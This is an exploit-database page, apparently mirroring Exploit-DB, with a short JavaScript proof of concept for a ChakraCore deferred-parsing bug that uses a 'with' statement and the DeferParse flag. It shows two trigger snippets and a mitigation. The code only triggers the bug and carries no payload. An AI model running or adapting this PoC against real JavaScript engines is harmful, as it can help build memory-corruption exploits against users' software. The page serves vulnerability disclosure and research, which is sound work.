header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
7.5
CVSS
HIGH
Code Injection
94
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

PoC for Issue 1310

The PoC is triggerable when the 'DeferParse' flag is enabled and requires a with statement. It can be triggered by using '
'.repeat(0x1000) or by using the command ./ch poc.js -ForceDeferParse.

Mitigation:

Disable the 'DeferParse' flag.
Source

Exploit-DB raw data:

/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to  issue 1310 .

PoC:
*/

// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());

Navigation

Suggest Exploit

Services By CQR